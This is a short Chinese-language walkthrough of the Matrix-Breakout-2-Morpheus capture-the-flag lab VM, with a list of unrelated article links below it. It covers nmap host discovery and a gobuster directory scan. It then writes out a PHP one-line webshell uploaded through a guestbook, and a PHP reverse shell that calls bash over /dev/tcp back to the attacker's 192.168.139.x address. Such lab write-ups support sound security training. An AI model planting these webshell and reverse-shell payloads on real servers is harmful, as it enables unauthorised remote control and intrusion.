当前位置: 首页 > news >正文

Matrix-Breakout-2-Morpheus靶场通关心得:技巧与经验分享

news 来源:原创 2025/5/17 23:15:29

1.安装靶机,并在虚拟机打开,确保和kali在同一个NAT网段

2.使用kali来确定该靶机的IP

nmap -O 192.168.139.1/24

3.访问该IP192.168.139.171

4.访问robots.txt

5.扫描目录

gobuster dir -u http://192.168.139.171 -x php,bak,txt,html -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt

6.依次访问,发现留言板功能

7.抓包查看

8.发现上传到了graffiti.txt内,尝试上传一句话木马

<?php eval($_POST[cmd]);?>

9.放行,然后用蚁剑进行连接

10.上传反弹shell的php文件

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.139.142/5555 0>&1'");?>

11.浏览器访问shell.php

kali : nc监听5555端口

相关文章:

  • 机器学习-手搓KNN算法
  • 小程序API —— 54 路由与通信 - 编程式导航
  • Mistral AI发布开源多模态模型Mistral Small 3.1:240亿参数实现超越GPT-4o Mini的性能
  • Handler消息机制源码分析
  • 从模拟到现实:Sensodrive高精度力反馈技术赋能物流运输的高效与安全
  • 基于Wasm的边缘计算Pandas:突破端侧AI的最后一公里——让数据分析在手机、IoT设备上飞驰
  • 若依 Excel导入与导出 配置下拉选项
  • 通过蒸馏大模型训练建筑向智能助手模型的思路
  • 63. 根文件系统构建
  • STM32 模拟SPI 模式0
  • 大模型+知识图谱:赋能知识智能新升级
  • Harmony OS【获取本地json数据的方法】
  • 【el-upload】el-upload组件 - list-type=“picture“ 时,文件预览展示优化
  • dfs(二十)257. 二叉树的所有路径
  • /proc/[pid]/maps介绍和pmap介绍、RSS
  • 《深入理解 TypeScript:函数类型与泛型全解析》(万字长文)
  • 【MyDB】5-索引管理之 1-索引管理思路概览
  • Centos7配置本地yum源
  • 大白话读懂java对象创建的过程
  • 织梦DedeCMS数据库表说明大全
  • 联合国:欢迎俄乌伊斯坦布尔会谈,希望实现全面停火
  • 国家统计局:2024年城镇单位就业人员工资平稳增长
  • 老字号“逆生长”,上海制造的出海“蜜”钥
  • 最高人民法院原副院长唐德华逝世,享年89岁
  • 现场丨在胡适施蛰存等手札与文献间,再看百年光华
  • 证券日报:降准今日正式落地,年内或还有降准空间